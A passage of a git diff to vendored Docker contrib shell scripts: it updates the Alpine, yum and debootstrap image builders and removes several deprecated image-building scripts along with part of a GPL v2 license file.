 
 	tar --numeric-owner -C $ROOTFS -c . | xz > rootfs.tar.xz
 }
 
-while getopts "hr:m:s" opt; do
+while getopts "hr:m:sc:a:" opt; do
 	case $opt in
 		r)
 			REL=$OPTARG
@@ -64,7 +64,10 @@ while getopts "hr:m:s" opt; do
 			SAVE=1
 			;;
 		c)
-			ADDITIONALREPO=community
+			ADDITIONALREPO=$OPTARG
+			;;
+		a)
+			ARCH=$OPTARG
 			;;
 		*)
 			usage
@@ -76,7 +79,7 @@ REL=${REL:-edge}
 MIRROR=${MIRROR:-http://nl.alpinelinux.org/alpine}
 SAVE=${SAVE:-0}
 MAINREPO=$MIRROR/$REL/main
-ADDITIONALREPO=$MIRROR/$REL/community
+ADDITIONALREPO=$MIRROR/$REL/${ADDITIONALREPO:-community}
 ARCH=${ARCH:-$(uname -m)}
 
 tmp
diff --git a/vendor/github.com/docker/docker/contrib/mkimage-busybox.sh b/vendor/github.com/docker/docker/contrib/mkimage-busybox.sh
deleted file mode 100755
index b11a6bb265..0000000000
--- a/vendor/github.com/docker/docker/contrib/mkimage-busybox.sh
+++ /dev/null
@@ -1,43 +0,0 @@
-#!/usr/bin/env bash
-# Generate a very minimal filesystem based on busybox-static,
-# and load it into the local docker under the name "busybox".
-
-echo >&2
-echo >&2 'warning: this script is deprecated - see mkimage.sh and mkimage/busybox-static'
-echo >&2
-
-BUSYBOX=$(which busybox)
-[ "$BUSYBOX" ] || {
-    echo "Sorry, I could not locate busybox."
-    echo "Try 'apt-get install busybox-static'?"
-    exit 1
-}
-
-set -e
-ROOTFS=${TMPDIR:-/var/tmp}/rootfs-busybox-$$-$RANDOM
-mkdir $ROOTFS
-cd $ROOTFS
-
-mkdir bin etc dev dev/pts lib proc sys tmp
-touch etc/resolv.conf
-cp /etc/nsswitch.conf etc/nsswitch.conf
-echo root:x:0:0:root:/:/bin/sh > etc/passwd
-echo root:x:0: > etc/group
-ln -s lib lib64
-ln -s bin sbin
-cp $BUSYBOX bin
-for X in $(busybox --list)
-do
-    ln -s busybox bin/$X
-done
-rm bin/init
-ln bin/busybox bin/init
-cp /lib/x86_64-linux-gnu/lib{pthread,c,dl,nsl,nss_*}.so.* lib
-cp /lib/x86_64-linux-gnu/ld-linux-x86-64.so.2 lib
-for X in console null ptmx random stdin stdout stderr tty urandom zero
-do
-    cp -a /dev/$X dev
-done
-
-tar --numeric-owner -cf- . | docker import - busybox
-docker run -i -u root busybox /bin/echo Success.
diff --git a/vendor/github.com/docker/docker/contrib/mkimage-debootstrap.sh b/vendor/github.com/docker/docker/contrib/mkimage-debootstrap.sh
deleted file mode 100755
index 412a5ce0a7..0000000000
--- a/vendor/github.com/docker/docker/contrib/mkimage-debootstrap.sh
+++ /dev/null
@@ -1,297 +0,0 @@
-#!/usr/bin/env bash
-set -e
-
-echo >&2
-echo >&2 'warning: this script is deprecated - see mkimage.sh and mkimage/debootstrap'
-echo >&2
-
-variant='minbase'
-include='iproute,iputils-ping'
-arch='amd64' # intentionally undocumented for now
-skipDetection=
-strictDebootstrap=
-justTar=
-
-usage() {
-	echo >&2
-
-	echo >&2 "usage: $0 [options] repo suite [mirror]"
-
-	echo >&2
-	echo >&2 'options: (not recommended)'
-	echo >&2 "  -p set an http_proxy for debootstrap"
-	echo >&2 "  -v $variant # change default debootstrap variant"
-	echo >&2 "  -i $include # change default package includes"
-	echo >&2 "  -d # strict debootstrap (do not apply any docker-specific tweaks)"
-	echo >&2 "  -s # skip version detection and tagging (ie, precise also tagged as 12.04)"
-	echo >&2 "     # note that this will also skip adding universe and/or security/updates to sources.list"
-	echo >&2 "  -t # just create a tarball, especially for dockerbrew (uses repo as tarball name)"
-
-	echo >&2
-	echo >&2 "   ie: $0 username/debian squeeze"
-	echo >&2 "       $0 username/debian squeeze http://ftp.uk.debian.org/debian/"
-
-	echo >&2
-	echo >&2 "   ie: $0 username/ubuntu precise"
-	echo >&2 "       $0 username/ubuntu precise http://mirrors.melbourne.co.uk/ubuntu/"
-
-	echo >&2
-	echo >&2 "   ie: $0 -t precise.tar.bz2 precise"
-	echo >&2 "       $0 -t wheezy.tgz wheezy"
-	echo >&2 "       $0 -t wheezy-uk.tar.xz wheezy http://ftp.uk.debian.org/debian/"
-
-	echo >&2
-}
-
-# these should match the names found at http://www.debian.org/releases/
-debianStable=wheezy
-debianUnstable=sid
-# this should match the name found at http://releases.ubuntu.com/
-ubuntuLatestLTS=trusty
-# this should match the name found at http://releases.tanglu.org/
-tangluLatest=aequorea
-
-while getopts v:i:a:p:dst name; do
-	case "$name" in
-		p)
-			http_proxy="$OPTARG"
-			;;
-		v)
-			variant="$OPTARG"
-			;;
-		i)
-			include="$OPTARG"
-			;;
-		a)
-			arch="$OPTARG"
-			;;
-		d)
-			strictDebootstrap=1
-			;;
-		s)
-			skipDetection=1
-			;;
-		t)
-			justTar=1
-			;;
-		?)
-			usage
-			exit 0
-			;;
-	esac
-done
-shift $(($OPTIND - 1))
-
-repo="$1"
-suite="$2"
-mirror="${3:-}" # stick to the default debootstrap mirror if one is not provided
-
-if [ ! "$repo" ] || [ ! "$suite" ]; then
-	usage
-	exit 1
-fi
-
-# some rudimentary detection for whether we need to "sudo" our docker calls
-docker=''
-if docker version > /dev/null 2>&1; then
-	docker='docker'
-elif sudo docker version > /dev/null 2>&1; then
-	docker='sudo docker'
-elif command -v docker > /dev/null 2>&1; then
-	docker='docker'
-else
-	echo >&2 "warning: either docker isn't installed, or your current user cannot run it;"
-	echo >&2 "         this script is not likely to work as expected"
-	sleep 3
-	docker='docker' # give us a command-not-found later
-fi
-
-# make sure we have an absolute path to our final tarball so we can still reference it properly after we change directory
-if [ "$justTar" ]; then
-	if [ ! -d "$(dirname "$repo")" ]; then
-		echo >&2 "error: $(dirname "$repo") does not exist"
-		exit 1
-	fi
-	repo="$(cd "$(dirname "$repo")" && pwd -P)/$(basename "$repo")"
-fi
-
-# will be filled in later, if [ -z "$skipDetection" ]
-lsbDist=''
-
-target="${TMPDIR:-/var/tmp}/docker-rootfs-debootstrap-$suite-$$-$RANDOM"
-
-cd "$(dirname "$(readlink -f "$BASH_SOURCE")")"
-returnTo="$(pwd -P)"
-
-if [ "$suite" = 'lucid' ]; then
-	# lucid fails and doesn't include gpgv in minbase; "apt-get update" fails
-	include+=',gpgv'
-fi
-
-set -x
-
-# bootstrap
-mkdir -p "$target"
-sudo http_proxy=$http_proxy debootstrap --verbose --variant="$variant" --include="$include" --arch="$arch" "$suite" "$target" "$mirror"
-
-cd "$target"
-
-if [ -z "$strictDebootstrap" ]; then
-	# prevent init scripts from running during install/update
-	#  policy-rc.d (for most scripts)
-	echo $'#!/bin/sh\nexit 101' | sudo tee usr/sbin/policy-rc.d > /dev/null
-	sudo chmod +x usr/sbin/policy-rc.d
-	#  initctl (for some pesky upstart scripts)
-	sudo chroot . dpkg-divert --local --rename --add /sbin/initctl
-	sudo ln -sf /bin/true sbin/initctl
-	# see https://github.com/docker/docker/issues/446#issuecomment-16953173
-
-	# shrink the image, since apt makes us fat (wheezy: ~157.5MB vs ~120MB)
-	sudo chroot . apt-get clean
-
-	if strings usr/bin/dpkg | grep -q unsafe-io; then
-		# while we're at it, apt is unnecessarily slow inside containers
-		#  this forces dpkg not to call sync() after package extraction and speeds up install
-		#    the benefit is huge on spinning disks, and the penalty is nonexistent on SSD or decent server virtualization
-		echo 'force-unsafe-io' | sudo tee etc/dpkg/dpkg.cfg.d/02apt-speedup > /dev/null
-		# we have this wrapped up in an "if" because the "force-unsafe-io"
-		# option was added in dpkg 1.15.8.6
-		# (see http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=584254#82),
-		# and ubuntu lucid/10.04 only has 1.15.5.6
-	fi
-
-	# we want to effectively run "apt-get clean" after every install to keep images small (see output of "apt-get clean -s" for context)
-	{
-		aptGetClean='"rm -f /var/cache/apt/archives/*.deb /var/cache/apt/archives/partial/*.deb /var/cache/apt/*.bin || true";'
-		echo "DPkg::Post-Invoke { ${aptGetClean} };"
-		echo "APT::Update::Post-Invoke { ${aptGetClean} };"
-		echo 'Dir::Cache::pkgcache ""; Dir::Cache::srcpkgcache "";'
-	} | sudo tee etc/apt/apt.conf.d/no-cache > /dev/null
-
-	# and remove the translations, too
-	echo 'Acquire::Languages "none";' | sudo tee etc/apt/apt.conf.d/no-languages > /dev/null
-
-	# helpful undo lines for each the above tweaks (for lack of a better home to keep track of them):
-	#  rm /usr/sbin/policy-rc.d
-	#  rm /sbin/initctl; dpkg-divert --rename --remove /sbin/initctl
-	#  rm /etc/dpkg/dpkg.cfg.d/02apt-speedup
-	#  rm /etc/apt/apt.conf.d/no-cache
-	#  rm /etc/apt/apt.conf.d/no-languages
-
-	if [ -z "$skipDetection" ]; then
-		# see also rudimentary platform detection in hack/install.sh
-		lsbDist=''
-		if [ -r etc/lsb-release ]; then
-			lsbDist="$(. etc/lsb-release && echo "$DISTRIB_ID")"
-		fi
-		if [ -z "$lsbDist" ] && [ -r etc/debian_version ]; then
-			lsbDist='Debian'
-		fi
-
-		case "$lsbDist" in
-			Debian)
-				# add the updates and security repositories
-				if [ "$suite" != "$debianUnstable" -a "$suite" != 'unstable' ]; then
-					# ${suite}-updates only applies to non-unstable
-					sudo sed -i "p; s/ $suite main$/ ${suite}-updates main/" etc/apt/sources.list
-
-					# same for security updates
-					echo "deb http://security.debian.org/ $suite/updates main" | sudo tee -a etc/apt/sources.list > /dev/null
-				fi
-				;;
-			Ubuntu)
-				# add the universe, updates, and security repositories
-				sudo sed -i "
-					s/ $suite main$/ $suite main universe/; p;
-					s/ $suite main/ ${suite}-updates main/; p;
-					s/ $suite-updates main/ ${suite}-security main/
-				" etc/apt/sources.list
-				;;
-			Tanglu)
-				# add the updates repository
-				if [ "$suite" = "$tangluLatest" ]; then
-					# ${suite}-updates only applies to stable Tanglu versions
-					sudo sed -i "p; s/ $suite main$/ ${suite}-updates main/" etc/apt/sources.list
-				fi
-				;;
-			SteamOS)
-				# add contrib and non-free
-				sudo sed -i "s/ $suite main$/ $suite main contrib non-free/" etc/apt/sources.list
-				;;
-		esac
-	fi
-
-	# make sure our packages lists are as up to date as we can get them
-	sudo chroot . apt-get update
-	sudo chroot . apt-get dist-upgrade -y
-fi
-
-if [ "$justTar" ]; then
-	# create the tarball file so it has the right permissions (ie, not root)
-	touch "$repo"
-
-	# fill the tarball
-	sudo tar --numeric-owner -caf "$repo" .
-else
-	# create the image (and tag $repo:$suite)
-	sudo tar --numeric-owner -c . | $docker import - $repo:$suite
-
-	# test the image
-	$docker run -i -t $repo:$suite echo success
-
-	if [ -z "$skipDetection" ]; then
-		case "$lsbDist" in
-			Debian)
-				if [ "$suite" = "$debianStable" -o "$suite" = 'stable' ] && [ -r etc/debian_version ]; then
-					# tag latest
-					$docker tag $repo:$suite $repo:latest
-
-					if [ -r etc/debian_version ]; then
-						# tag the specific debian release version (which is only reasonable to tag on debian stable)
-						ver=$(cat etc/debian_version)
-						$docker tag $repo:$suite $repo:$ver
-					fi
-				fi
-				;;
-			Ubuntu)
-				if [ "$suite" = "$ubuntuLatestLTS" ]; then
-					# tag latest
-					$docker tag $repo:$suite $repo:latest
-				fi
-				if [ -r etc/lsb-release ]; then
-					lsbRelease="$(. etc/lsb-release && echo "$DISTRIB_RELEASE")"
-					if [ "$lsbRelease" ]; then
-						# tag specific Ubuntu version number, if available (12.04, etc.)
-						$docker tag $repo:$suite $repo:$lsbRelease
-					fi
-				fi
-				;;
-			Tanglu)
-				if [ "$suite" = "$tangluLatest" ]; then
-					# tag latest
-					$docker tag $repo:$suite $repo:latest
-				fi
-				if [ -r etc/lsb-release ]; then
-					lsbRelease="$(. etc/lsb-release && echo "$DISTRIB_RELEASE")"
-					if [ "$lsbRelease" ]; then
-						# tag specific Tanglu version number, if available (1.0, 2.0, etc.)
-						$docker tag $repo:$suite $repo:$lsbRelease
-					fi
-				fi
-				;;
-			SteamOS)
-				if [ -r etc/lsb-release ]; then
-					lsbRelease="$(. etc/lsb-release && echo "$DISTRIB_RELEASE")"
-					if [ "$lsbRelease" ]; then
-						# tag specific SteamOS version number, if available (1.0, 2.0, etc.)
-						$docker tag $repo:$suite $repo:$lsbRelease
-					fi
-				fi
-				;;
-		esac
-	fi
-fi
-
-# cleanup
-cd "$returnTo"
-sudo rm -rf "$target"
diff --git a/vendor/github.com/docker/docker/contrib/mkimage-rinse.sh b/vendor/github.com/docker/docker/contrib/mkimage-rinse.sh
deleted file mode 100755
index 7e0935062f..0000000000
--- a/vendor/github.com/docker/docker/contrib/mkimage-rinse.sh
+++ /dev/null
@@ -1,123 +0,0 @@
-#!/usr/bin/env bash
-#
-# Create a base CentOS Docker image.
-
-# This script is useful on systems with rinse available (e.g.,
-# building a CentOS image on Debian).  See contrib/mkimage-yum.sh for
-# a way to build CentOS images on systems with yum installed.
-
-set -e
-
-echo >&2
-echo >&2 'warning: this script is deprecated - see mkimage.sh and mkimage/rinse'
-echo >&2
-
-repo="$1"
-distro="$2"
-mirror="$3"
-
-if [ ! "$repo" ] || [ ! "$distro" ]; then
-	self="$(basename $0)"
-	echo >&2 "usage: $self repo distro [mirror]"
-	echo >&2
-	echo >&2 "   ie: $self username/centos centos-5"
-	echo >&2 "       $self username/centos centos-6"
-	echo >&2
-	echo >&2 "   ie: $self username/slc slc-5"
-	echo >&2 "       $self username/slc slc-6"
-	echo >&2
-	echo >&2 "   ie: $self username/centos centos-5 http://vault.centos.org/5.8/os/x86_64/CentOS/"
-	echo >&2 "       $self username/centos centos-6 http://vault.centos.org/6.3/os/x86_64/Packages/"
-	echo >&2
-	echo >&2 'See /etc/rinse for supported values of "distro" and for examples of'
-	echo >&2 '  expected values of "mirror".'
-	echo >&2
-	echo >&2 'This script is tested to work with the original upstream version of rinse,'
-	echo >&2 '  found at http://www.steve.org.uk/Software/rinse/ and also in Debian at'
-	echo >&2 '  http://packages.debian.org/wheezy/rinse -- as always, YMMV.'
-	echo >&2
-	exit 1
-fi
-
-target="${TMPDIR:-/var/tmp}/docker-rootfs-rinse-$distro-$$-$RANDOM"
-
-cd "$(dirname "$(readlink -f "$BASH_SOURCE")")"
-returnTo="$(pwd -P)"
-
-rinseArgs=( --arch amd64 --distribution "$distro" --directory "$target" )
-if [ "$mirror" ]; then
-	rinseArgs+=( --mirror "$mirror" )
-fi
-
-set -x
-
-mkdir -p "$target"
-
-sudo rinse "${rinseArgs[@]}"
-
-cd "$target"
-
-# rinse fails a little at setting up /dev, so we'll just wipe it out and create our own
-sudo rm -rf dev
-sudo mkdir -m 755 dev
-(
-	cd dev
-	sudo ln -sf /proc/self/fd ./
-	sudo mkdir -m 755 pts
-	sudo mkdir -m 1777 shm
-	sudo mknod -m 600 console c 5 1
-	sudo mknod -m 600 initctl p
-	sudo mknod -m 666 full c 1 7
-	sudo mknod -m 666 null c 1 3
-	sudo mknod -m 666 ptmx c 5 2
-	sudo mknod -m 666 random c 1 8
-	sudo mknod -m 666 tty c 5 0
-	sudo mknod -m 666 tty0 c 4 0
-	sudo mknod -m 666 urandom c 1 9
-	sudo mknod -m 666 zero c 1 5
-)
-
-# effectively: febootstrap-minimize --keep-zoneinfo --keep-rpmdb --keep-services "$target"
-#  locales
-sudo rm -rf usr/{{lib,share}/locale,{lib,lib64}/gconv,bin/localedef,sbin/build-locale-archive}
-#  docs and man pages
-sudo rm -rf usr/share/{man,doc,info,gnome/help}
-#  cracklib
-sudo rm -rf usr/share/cracklib
-#  i18n
-sudo rm -rf usr/share/i18n
-#  yum cache
-sudo rm -rf var/cache/yum
-sudo mkdir -p --mode=0755 var/cache/yum
-#  sln
-sudo rm -rf sbin/sln
-#  ldconfig
-#sudo rm -rf sbin/ldconfig
-sudo rm -rf etc/ld.so.cache var/cache/ldconfig
-sudo mkdir -p --mode=0755 var/cache/ldconfig
-
-# allow networking init scripts inside the container to work without extra steps
-echo 'NETWORKING=yes' | sudo tee etc/sysconfig/network > /dev/null
-
-# to restore locales later:
-#  yum reinstall glibc-common
-
-version=
-if [ -r etc/redhat-release ]; then
-	version="$(sed -E 's/^[^0-9.]*([0-9.]+).*$/\1/' etc/redhat-release)"
-elif [ -r etc/SuSE-release ]; then
-	version="$(awk '/^VERSION/ { print $3 }' etc/SuSE-release)"
-fi
-
-if [ -z "$version" ]; then
-	echo >&2 "warning: cannot autodetect OS version, using $distro as tag"
-	sleep 20
-	version="$distro"
-fi
-
-sudo tar --numeric-owner -c . | docker import - $repo:$version
-
-docker run -i -t $repo:$version echo success
-
-cd "$returnTo"
-sudo rm -rf "$target"
diff --git a/vendor/github.com/docker/docker/contrib/mkimage-yum.sh b/vendor/github.com/docker/docker/contrib/mkimage-yum.sh
index 29da170480..901280451b 100755
--- a/vendor/github.com/docker/docker/contrib/mkimage-yum.sh
+++ b/vendor/github.com/docker/docker/contrib/mkimage-yum.sh
@@ -81,13 +81,13 @@ fi
 if [[ -n "$install_groups" ]];
 then
     yum -c "$yum_config" --installroot="$target" --releasever=/ --setopt=tsflags=nodocs \
-        --setopt=group_package_types=mandatory -y groupinstall $install_groups
+        --setopt=group_package_types=mandatory -y groupinstall "$install_groups"
 fi
 
 if [[ -n "$install_packages" ]];
 then
     yum -c "$yum_config" --installroot="$target" --releasever=/ --setopt=tsflags=nodocs \
-        --setopt=group_package_types=mandatory -y install $install_packages
+        --setopt=group_package_types=mandatory -y install "$install_packages"
 fi
 
 yum -c "$yum_config" --installroot="$target" -y clean all
diff --git a/vendor/github.com/docker/docker/contrib/mkimage.sh b/vendor/github.com/docker/docker/contrib/mkimage.sh
index 13298c8036..ae05d139c3 100755
--- a/vendor/github.com/docker/docker/contrib/mkimage.sh
+++ b/vendor/github.com/docker/docker/contrib/mkimage.sh
@@ -11,7 +11,6 @@ usage() {
 	echo >&2 "       $mkimg -t someuser/centos:5 rinse --distribution centos-5"
 	echo >&2 "       $mkimg -t someuser/mageia:4 mageia-urpmi --version=4"
 	echo >&2 "       $mkimg -t someuser/mageia:4 mageia-urpmi --version=4 --mirror=http://somemirror/"
-	echo >&2 "       $mkimg -t someuser/solaris solaris" 
 	exit 1
 }
 
@@ -20,13 +19,6 @@ scriptDir="$(dirname "$(readlink -f "$BASH_SOURCE")")/mkimage"
 os=
 os=$(uname -o)
 
-# set up path to gnu tools if solaris
-[[ $os == "Solaris" ]] && export PATH=/usr/gnu/bin:$PATH 
-# TODO check for gnu-tar, gnu-getopt
-
-# TODO requires root/sudo due to some pkg operations. sigh.
-[[ $os == "Solaris" && $EUID != "0" ]] && echo >&2 "image create on Solaris requires superuser privilege"
-
 optTemp=$(getopt --options '+d:t:c:hC' --longoptions 'dir:,tag:,compression:,no-compression,help' --name "$mkimg" -- "$@")
 eval set -- "$optTemp"
 unset optTemp
diff --git a/vendor/github.com/docker/docker/contrib/mkimage/debootstrap b/vendor/github.com/docker/docker/contrib/mkimage/debootstrap
index 7d56d8ea9f..9f7d8987ad 100755
--- a/vendor/github.com/docker/docker/contrib/mkimage/debootstrap
+++ b/vendor/github.com/docker/docker/contrib/mkimage/debootstrap
@@ -1,7 +1,21 @@
 #!/usr/bin/env bash
 set -e
 
+mkimgdeb="$(basename "$0")"
+mkimg="$(dirname "$0").sh"
+
+usage() {
+	echo >&2 "usage: $mkimgdeb rootfsDir suite [debootstrap-args]"
+	echo >&2 " note: $mkimgdeb meant to be used from $mkimg"
+	exit 1
+}
+
 rootfsDir="$1"
+if [ -z "$rootfsDir" ]; then
+	echo >&2 "error: rootfsDir is missing"
+	echo >&2
+	usage
+fi
 shift
 
 # we have to do a little fancy footwork to make sure "rootfsDir" becomes the second non-option argument to debootstrap
@@ -13,10 +27,21 @@ while [ $# -gt 0 ] && [[ "$1" == -* ]]; do
 done
 
 suite="$1"
+if [ -z "$suite" ]; then
+	echo >&2 "error: suite is missing"
+	echo >&2
+	usage
+fi
 shift
 
 # get path to "chroot" in our current PATH
-chrootPath="$(type -P chroot)"
+chrootPath="$(type -P chroot || :)"
+if [ -z "$chrootPath" ]; then
+	echo >&2 "error: chroot not found. Are you root?"
+	echo >&2
+	usage
+fi
+
 rootfs_chroot() {
 	# "chroot" doesn't set PATH, so we need to set it explicitly to something our new debootstrap chroot can use appropriately!
 
@@ -168,7 +193,7 @@ if [ -z "$DONT_TOUCH_SOURCES_LIST" ]; then
 	case "$lsbDist" in
 		debian)
 			# updates and security!
-			if [ "$suite" != 'sid' -a "$suite" != 'unstable' ]; then
+			if curl -o /dev/null -s --head --fail "http://security.debian.org/dists/$suite/updates/main/binary-$(rootfs_chroot dpkg --print-architecture)/Packages.gz"; then
 				(
 					set -x
 					sed -i "
diff --git a/vendor/github.com/docker/docker/contrib/mkimage/solaris b/vendor/github.com/docker/docker/contrib/mkimage/solaris
deleted file mode 100755
index 158970e69e..0000000000
--- a/vendor/github.com/docker/docker/contrib/mkimage/solaris
+++ /dev/null
@@ -1,89 +0,0 @@
-#!/usr/bin/env bash
-#
-# Solaris 12 base image build script. 
-#
-set -e
-
-# TODO add optional package publisher origin
-
-rootfsDir="$1"
-shift
-
-# base install
-(
-	set -x
-
-	pkg image-create --full --zone \
-		--facet facet.locale.*=false \
-		--facet facet.locale.POSIX=true \
-		--facet facet.doc=false \
-		--facet facet.doc.*=false \
-		"$rootfsDir"
-
-	pkg -R "$rootfsDir" set-property use-system-repo true
-
-	pkg -R "$rootfsDir" set-property flush-content-cache-on-success true
-
-	pkg -R "$rootfsDir" install core-os
-)
-
-# Lay in stock configuration, set up milestone
-# XXX This all may become optional in a base image
-(
-	# faster to build repository database on tmpfs
-	REPO_DB=/system/volatile/repository.$$
-	export SVCCFG_REPOSITORY=${REPO_DB}
-	export SVCCFG_DOOR_PATH=$rootfsDir/system/volatile/tmp_repo_door
-
-	# Import base manifests. NOTE These are a combination of basic requirement
-	# and gleaned from container milestone manifest. They may change.
-	for m in $rootfsDir/lib/svc/manifest/system/environment.xml \
-		$rootfsDir/lib/svc/manifest/system/svc/global.xml \
-		$rootfsDir/lib/svc/manifest/system/svc/restarter.xml \
-		$rootfsDir/lib/svc/manifest/network/dns/client.xml \
-		$rootfsDir/lib/svc/manifest/system/name-service/switch.xml \
-		$rootfsDir/lib/svc/manifest/system/name-service/cache.xml \
-		$rootfsDir/lib/svc/manifest/milestone/container.xml ; do
-		svccfg import $m
-	done
-
-	# Apply system layer profile, deleting unnecessary dependencies
-	svccfg apply $rootfsDir/etc/svc/profile/generic_container.xml 
-
-	# XXX Even if we keep a repo in the base image, this is definitely optional
-	svccfg apply $rootfsDir/etc/svc/profile/sysconfig/container_sc.xml
-
-	for s in svc:/system/svc/restarter \
-		svc:/system/environment \
-		svc:/network/dns/client \
-		svc:/system/name-service/switch \
-		svc:/system/name-service/cache \
-		svc:/system/svc/global \
-		svc:/milestone/container ;do
-		svccfg -s $s refresh
-	done
-
-	# now copy the built up repository into the base rootfs
-	mv $REPO_DB $rootfsDir/etc/svc/repository.db
-)
-
-# pkg(1) needs the zoneproxy-client running in the container.
-# use a simple wrapper to run it as needed.
-# XXX maybe we go back to running this in SMF?
-mv "$rootfsDir/usr/bin/pkg" "$rootfsDir/usr/bin/wrapped_pkg"
-cat > "$rootfsDir/usr/bin/pkg" <<-'EOF'
-#!/bin/sh
-#
-# THIS FILE CREATED DURING DOCKER BASE IMAGE CREATION
-# 
-# The Solaris base image uses the sysrepo proxy mechanism. The
-# IPS client pkg(1) requires the zoneproxy-client to reach the
-# remote publisher origins through the host. This wrapper script
-# enables and disables the proxy client as needed. This is a
-# temporary solution.
-
-/usr/lib/zones/zoneproxy-client -s localhost:1008
-PKG_SYSREPO_URL=http://localhost:1008 /usr/bin/wrapped_pkg "$@"
-pkill -9 zoneproxy-client
-EOF
-chmod +x "$rootfsDir/usr/bin/pkg"
diff --git a/vendor/github.com/docker/docker/contrib/nuke-graph-directory.sh b/vendor/github.com/docker/docker/contrib/nuke-graph-directory.sh
index 5eeb45c8bd..3d2f49e869 100755
--- a/vendor/github.com/docker/docker/contrib/nuke-graph-directory.sh
+++ b/vendor/github.com/docker/docker/contrib/nuke-graph-directory.sh
@@ -1,4 +1,4 @@
-#!/bin/sh
+#!/usr/bin/env bash
 set -e
 
 dir="$1"
diff --git a/vendor/github.com/docker/docker/contrib/project-stats.sh b/vendor/github.com/docker/docker/contrib/project-stats.sh
deleted file mode 100755
index 2691c72ffb..0000000000
--- a/vendor/github.com/docker/docker/contrib/project-stats.sh
+++ /dev/null
@@ -1,22 +0,0 @@
-#!/usr/bin/env bash
-
-## Run this script from the root of the docker repository
-## to query project stats useful to the maintainers.
-## You will need to install `pulls` and `issues` from
-## https://github.com/crosbymichael/pulls
-
-set -e
-
-echo -n "Open pulls: "
-PULLS=$(pulls | wc -l); let PULLS=$PULLS-1
-echo $PULLS
-
-echo -n "Pulls alru: "
-pulls alru
-
-echo -n "Open issues: "
-ISSUES=$(issues list | wc -l); let ISSUES=$ISSUES-1
-echo $ISSUES
-
-echo -n "Issues alru: "
-issues alru
diff --git a/vendor/github.com/docker/docker/contrib/reprepro/suites.sh b/vendor/github.com/docker/docker/contrib/reprepro/suites.sh
deleted file mode 100755
index 9ecf99d465..0000000000
--- a/vendor/github.com/docker/docker/contrib/reprepro/suites.sh
+++ /dev/null
@@ -1,12 +0,0 @@
-#!/bin/bash
-set -e
-
-cd "$(dirname "$BASH_SOURCE")/../.."
-
-targets_from() {
-       git fetch -q https://github.com/docker/docker.git "$1"
-       git ls-tree -r --name-only "$(git rev-parse FETCH_HEAD)" contrib/builder/deb/ | grep '/Dockerfile$' | sed -r 's!^contrib/builder/deb/|^contrib/builder/deb/amd64/|-debootstrap|/Dockerfile$!!g' | grep -v /
-}
-
-release_branch=$(git ls-remote --heads https://github.com/docker/docker.git | awk -F 'refs/heads/' '$2 ~ /^release/ { print $2 }' | sort -V | tail -1)
-{ targets_from master; targets_from "$release_branch"; } | sort -u
diff --git a/vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/LICENSE b/vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/LICENSE
deleted file mode 100644
index d511905c16..0000000000
--- a/vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/LICENSE
+++ /dev/null
@@ -1,339 +0,0 @@
-		    GNU GENERAL PUBLIC LICENSE
-		       Version 2, June 1991
-
- Copyright (C) 1989, 1991 Free Software Foundation, Inc.,
- 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
- Everyone is permitted to copy and distribute verbatim copies
- of this license document, but changing it is not allowed.
-
-			    Preamble
-
-  The licenses for most software are designed to take away your
-freedom to share and change it.  By contrast, the GNU General Public
-License is intended to guarantee your freedom to share and change free
-software--to make sure the software is free for all its users.  This
-General Public License applies to most of the Free Software
-Foundation's software and to any other program whose authors commit to
-using it.  (Some other Free Software Foundation software is covered by
-the GNU Lesser General Public License instead.)  You can apply it to
-your programs, too.
-
-  When we speak of free software, we are referring to freedom, not
-price.  Our General Public Licenses are designed to make sure that you
-have the freedom to distribute copies of free software (and charge for
-this service if you wish), that you receive source code or can get it
-if you want it, that you can change the software or use pieces of it
-in new free programs; and that you know you can do these things.
-
-  To protect your rights, we need to make restrictions that forbid
-anyone to deny you these rights or to ask you to surrender the rights.
-These restrictions translate to certain responsibilities for you if you
-distribute copies of the software, or if you modify it.
-
-  For example, if you distribute copies of such a program, whether
-gratis or for a fee, you must give the recipients all the rights that
-you have.  You must make sure that they, too, receive or can get the
-source code.  And you must show them these terms so they know their
-rights.
-
-  We protect your rights with two steps: (1) copyright the software, and
-(2) offer you this license which gives you legal permission to copy,
-distribute and/or modify the software.
-
-  Also, for each author's protection and ours, we want to make certain
-that everyone understands that there is no warranty for this free
-software.  If the software is modified by someone else and passed on, we
-want its recipients to know that what they have is not the original, so
-that any problems introduced by others will not reflect on the original
-authors' reputations.
-
-  Finally, any free program is threatened constantly by software
-patents.  We wish to avoid the danger that redistributors of a free
-program will individually obtain patent licenses, in effect making the
-program proprietary.  To prevent this, we have made it clear that any
-patent must be licensed for everyone's free use or not licensed at all.
-
-  The precise terms and conditions for copying, distribution and
-modification follow.
-
-		    GNU GENERAL PUBLIC LICENSE
-   TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION
-
-  0. This License applies to any program or other work which contains
-a notice placed by the copyright holder saying it may be distributed
-under the terms of this General Public License.  The "Program", below,
-refers to any such program or work, and a "work based on the Program"
-means either the Program or any derivative work under copyright law:
-that is to say, a work containing the Program or a portion of it,
-either verbatim or with modifications and/or translated into another
-language.  (Hereinafter, translation is included without limitation in
-the term "modification".)  Each licensee is addressed as "you".
-
-Activities other than copying, distribution and modification are not
-covered by this License; they are outside its scope.  The act of
-running the Program is not restricted, and the output from the Program
-is covered only if its contents constitute a work based on the
-Program (independent of having been made by running the Program).
-Whether that is true depends on what the Program does.
-
-  1. You may copy and distribute verbatim copies of the Program's
-source code as you receive it, in any medium, provided that you
-conspicuously and appropriately publish on each copy an appropriate
-copyright notice and disclaimer of warranty; keep intact all the
-notices that refer to this License and to the absence of any warranty;
-and give any other recipients of the Program a copy of this License
-along with the Program.
-
-You may charge a fee for the physical act of transferring a copy, and
-you may at your option offer warranty protection in exchange for a fee.
-
-  2. You may modify your copy or copies of the Program or any portion
-of it, thus forming a work based on the Program, and copy and
-distribute such modifications or work under the terms of Section 1
-above, provided that you also meet all of these conditions:
-
-    a) You must cause the modified files to carry prominent notices
-    stating that you changed the files and the date of any change.
-
-    b) You must cause any work that you distribute or publish, that in
-    whole or in part contains or is derived from the Program or any
-    part thereof, to be licensed as a whole at no charge to all third
-    parties under the terms of this License.
-
-    c) If the modified program normally reads commands interactively
-    when run, you must cause it, when started running for such
-    interactive use in the most ordinary way, to print or display an
-    announcement including an appropriate copyright notice and a
